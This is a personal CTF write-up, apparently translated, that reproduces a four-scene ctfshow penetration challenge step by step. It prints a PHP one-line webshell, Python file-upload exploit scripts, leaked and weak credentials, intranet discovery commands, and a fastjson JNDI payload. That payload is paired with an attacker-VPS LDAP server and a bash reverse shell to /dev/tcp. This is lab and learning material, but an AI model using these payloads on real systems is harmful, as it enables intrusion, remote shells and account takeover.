Because it is not an official wp, and it is reproduced according to the official wp, commonly known as looking at the answer to do the question, so it is called the folk reproduction wp (
For this question, I just said “I don’t know how to watch the fun”. I matched it several times on anonymous chat sites, but I didn’t match the group owner who distributed vegetable dog toys. Later, because the platform was damaged many times, The webmaster replaced the getshell in Scenario 1 with information leakage (it should be changed back after the game), and I saw the leaked user name and password, but found that it was useless to enter the background of the anonymous chat website, so I directly Swing (
Later, after reading the official wp, I realized that I had to use the username and password to log in to the real 163 mailbox. This is really unexpected. Wow~
Alright, all the thoughts are over, before the platform is closed (it’s been over 72 hours, did our beloved webmaster forget…) Hurry up and write (water) a blog!
Table of Contents
- scene one
-
- 1. Information collection
-
- 1) Know the project name
- 2) Go to github to search for the project name
- 2. Source code audit
- 3. getshell
-
- 1) Upload files with the help of Python scripts
- 2) Ant sword connection
- 4. Obtain an account
- scene two
-
- 1. Log in to your mailbox to check your email
- 2. Open encrypted emails with weak passwords
- 3. Obtain the address of the new scene
- scene three
-
- source code audit
- scene four
-
- 1. getshell
-
- 1) Log in to get cookies
- 2) Upload files with the help of Python scripts
- 2) Ant sword connection
- 2. Intranet scanning
-
- 1) Get the current ip
- 2) Find the surviving host
- 3) Found that there is a fastjson port
- 3. Lateral Penetration
-
- 1) Start listening and specify the rebound port merged in one step
- 2) Listen for rebound
- 3) Create a new file on the server connected to Ant Sword
- 4) Execute commands in the virtual terminal of Ant Sword
- 5) Successfully rebound the shell
- postscript
Scene 1
1. Information collection
1) Know the project name
Open scene 1 and see an anonymous chat website. I think of the idea of using the project name that appeared at the bottom of the website to find the source code on github in the official WP of the “first” infiltration competition, so I click on at the bottom of the website Check help to see if you can get some information
Then I saw the project name from the bottom of the help documentation page: Anonymous-Chat-Room
2) Go to github to search for the project name
Here we need to use Search all over the site, and the first one will be it! Click in to see the source code.
2. Source code audit
Seeing that there are so many files, if you ask me to do a source code audit, I will really not be able to read them. Maybe it will be better if you read more and gain more experience. The premise is to really read more…
I learned from the official wp that the source code with vulnerabilities is in Anonymous-Chat-Room/client/photo_upload.php, and later read other master’s wp and learned that there is a function of uploading pictures in the chat interface. You can see that there is a problem with the photo_upload.php file by capturing packets, and there is a arbitrary file upload vulnerability. I feel that it is easier and faster to find problems from the function than to look at the code one by one. A lot, that is, first capture and analyze certain function points, locate the files with vulnerabilities, and then look at the source code in the corresponding files in a targeted manner, and learn a lot.
And, From the source code, you can also know that the path where the file is saved after uploading is images/photo/, so you can upload a sentence of Trojan horse next~
3. getshell
1) Upload files with Python script
First create a new file 1.txt, the content is a one-sentence Trojan horse:
<?php eval($_POST[1]); ?>
Then upload the php file with the help of a Python script, here is the Python script in the official wp, note that the file type here must meet the above requirements in the source code strong>
import requests
url="https://i.am.ctfer.com/photo_upload.php"
files = {<!-- -->'file': ('1.php', open('1.txt', 'rb'), 'image/gif', {<!-- -->'Expires ': '0'})}
response = requests. post(url=url,files=files)
print(response. text)
Running this Python script will print out the name of the file uploaded to the server (that is, the content of the response package). Here is 64103df7e47051.php. As for the path where this php file is saved? It is the images/photo/ seen from the source code above, and then you can move to Ant Sword to try to see if it can be successfully connected.
2) Ant Sword Connection
Of course, you don’t need Python scripts, and uploading files with burp is the same. Send a file in the chat window that is a one-sentence Trojan horse with an extension of a picture type (such as jpg), intercept or resend it in burp and change the extension to php. Okay, this is what I tried in burp later:
4. Get an account
According to my few experiences, the next step is to look for login information in this server. I feel like going to /var/www/html/, and then I see login.php in this path. Click to open it. Look, it is here. So we got:
Username: [email protected]
Password: Hacker_ctfsh0w
Although there is a website background in scene 1, it was useless to log in at that time, and the test center was indeed not here. The correct next step is to log in to the real 163 mailbox.
Scene Two
1. Log in to your mailbox to check your email
Username: [email protected]
Password: Hacker_ctfsh0w
Login 163 mailbox
See the more “suspicious” email “ctfshow entry notice”
2. Weak password to open encrypted email
Open the email and find that it is an encrypted email with a weak password of 123456
3. Get the address of the new scene
After opening the email, two new addresses appeared
Scene Three
Source code audit
Open the “Development Address” in the email, and after successfully logging in with the login key, you can see the source code of the xblog application. From the official wp, there is an upload vulnerability in /c/t.php, Here There is a logic problem in $d, which is brought into the php file without filtering.
I really can’t see it, it’s too bold (referring to bold guesses and bold attempts to make this step
And here You can directly getshell in the terminal of vscode, although I don’t know what the use of getshell is here, but I didn’t know that you can do this in vscode before!
Scene Four
1. getshell
1) Login to get cookie
Opening https://blog.ctfer.com/ directly looks like this
From the official wp, you need to log in to https://blog.ctfer.com/a/
As for why it is logged in from /a/, it may be learned from the code audit in “Scenario 3”? You can see that there are codes related to login in /a/index.php
Then go to https://blog.ctfer.com/a/
What you see is the following interface, enter admin:123456
Then In the next interface, enter admin:123456 again to log in
One thing I don’t quite understand is why sometimes when I visit https://blog.ctfer.com/a/, the interface in the above picture will appear directly (that is, the “detected you” in the previous picture is gone) This is the first time to enter” interface), and then enter admin:123456 here and will prompt “Verification Error”, sometimes clearing the browser cache, exiting the browser and reopening is still the same situation , you need to wait for a short while to get back to normal… However, when it goes well, even if the login status is gone, you can just refresh and log in again, and the cookie after login will not change. I don’t understand.
After a normal login, it looks like this, and enters an editing interface:
And we mainly want to get the successful login cookie, which can be found and copied from the “Network” of the browser developer tools
You can see that the cookie here is 85be88a3bfcf87c0c32a86acf746a419, which needs to be put into the Python script used in the next step.
2) Upload files with Python script
The script comes from the official wp, just replace the cookie with the cookie when you logged in
Note that the dat variable is preceded by “; then eval($_POST[1])
# -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2023-03-09 11:05:32 # @Last Modified by: h1xa # @Last Modified time: 2023-03-09 11:38:22 # @email: [email protected] # @link: https://ctfer.com import requests url = "https://blog.ctfer.com/c/t.php" cookie={<!-- --> "PHPSESSID":"85be88a3bfcf87c0c32a86acf746a419" } data={<!-- --> "dat":'";eval($_POST[1]);?>', "title": "1", "content":" ", } response = requests. post(url=url + "?type=submit",data=data,cookies=cookie) print(response. text)
Run the script, and the printed result when the file is successfully uploaded is:
The uploaded file is saved in /p/0.php, this is also learned from the code audit of “Scenario 3”, let’s put a screenshot here~ (sometimes “pid” may also appear :1, Phuket because someone else uploaded the file just before this?
2) Ant Sword Connection
2. Intranet scanning
(But I don’t know how to scan, so I will briefly record the reappearance results
1) Get current ip
Execute commands in the virtual terminal of Ant Sword
ip addr show
It is known that the intranet address of the current host is 192.168.102.3 (sometimes it may be .2)
2) Find the surviving host
Execute ping 192.168.102.2 -c 1
Seeing that the execution result shows no packet loss, I found the surviving host 192.168.102.2 (if the previous step was .2, then this step is .3, you know)
(I don’t know how to scan here… Fortunately, I can try it out when I reproduce it
3) Found that there is a fastjson port
Execute curl http://192.168.102.2:8090
Found that there is a fastjson port of 8090
3. Lateral penetration
The following is the most difficult part for me. Although for masters who are familiar with the nday vulnerability, the recurrence of the fastjson vulnerability is very familiar and routine, but for me, it is difficult to reproduce it (holding back tears , can’t help it, can’t bear it, wow T o T
Let me talk about the result first, I did not reproduce it according to the official wp steps, the reason is that my intermediate process did not completely follow the official wp, because I temporarily borrowed a colleague’s vps, and his vps cannot execute javac, so I first in my Execute the javac command on this machine (MacOS) and then put the generated class file in the vps, it may cause problems due to cross-platform, this is the most likely result I have tried so far after countless times The reason… During this process, a very powerful boss has been guiding me. He is very patient, explaining the details to me and helping me analyze the reasons. I am really grateful to him.
Later, my colleague of Juan Wang said that he got it done, and there is a little difference in the method, so I will record the method I learned from my colleague here:
1) Start listening and specify the rebound port combined in one step
This should save the steps of generating malicious classes and vps hanging malicious classes in the official wp, and avoid the cross-platform problem of my class files. Of course, it does not mean that the method used by the official wp is not good. I read a few articles about fastjson before. The reproduced articles are all the steps on the official wp, the main reason is that I still can’t get it right after I have tried it…
The following method is to use one command to do two operations of starting monitoring and specifying the rebound port (should it be said so?
First download fastjson_tool.jar to the vps, and then execute the command in its directory:
java -cp fastjson_tool.jar fastjson.HLDAPServer write vps public network ip here 3389 "bash -c {echo, base64 code to execute the command}|{base64,-d}|{bash,-i} "
The command to be executed after echo is
bash -i > & amp; /dev/tcp/vps ip/9999 0> & amp; 1
The base64 encoding of this command can be obtained with tools, here the listened port and the last bounced port I use in the official wp The same, respectively 3389, 9999
2) Monitor bounce
Open another ssh connection window and execute the command nc -lvvnp 9999
3) Create a new file on the server connected to Ant Sword
Create two new files on the server connected by Ant Sword, x.json and a.sh, which are roughly the same as the official wp here. You need to replace the vps address with your own, and for the value of “dataSourceName”, the previous ldap and the last Object are rmi and Exploit in the official wp.
If the connection of Ant Sword is broken, log in again and upload a one-sentence Trojan horse, and then test the connection.
Contents of x.json:
{
“e”: {
“@type”: “java.lang.Class”,
“val”: “com.sun.rowset.JdbcRowSetImpl”
},
“f”: {
“@type”: “com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”: “ldap://vps address:3389/Object”,
“autoCommit”: true
}
}
The content of a.sh is the same as the official wp:
curl -X POST -H ‘content-type:application/json’ http://192.168.102.2:8090/ -d @x.json
Note that the ip here is the intranet ip of the previous “survival host”, and it may be .3 in the end
4) Execute commands in the virtual terminal of Ant Sword
First give a.shadd execution permission, and then execute a.sh
chmod u+x a.sh
./a.sh >2.txt
cat 2.txt
The result is as follows:
5) Successfully rebound the shell
Check the ssh connection window that received the bounce, and see that the shell has been bounced, but there is no /root/flag.txt when it is reproduced, so just take a look at it with ls, and the reproduction is over here.
Postscript
Thanks again for the help of a super big guy, I feel very happy. Thanks to my colleagues for lending me vps and taking time out of their busy schedules to reproduce the final horizontal penetration of this question and teach me. Thanks to the ctfshow webmaster for providing such a fun infiltration game and detailed official wp so that noobs like me can reproduce it.
I can really read too much… It’s so tiring to write a blog. Because some content in the middle is still not really understood, so there may be some wrong expressions, welcome to criticize and correct. I am really too weak. Once you accept your own weakness, is it open? Or can you let go of the burden in your heart and concentrate on making yourself stronger? Can hard work really make you stronger? Comparison is a thief who steals happiness, wishing to gain every inch of happiness.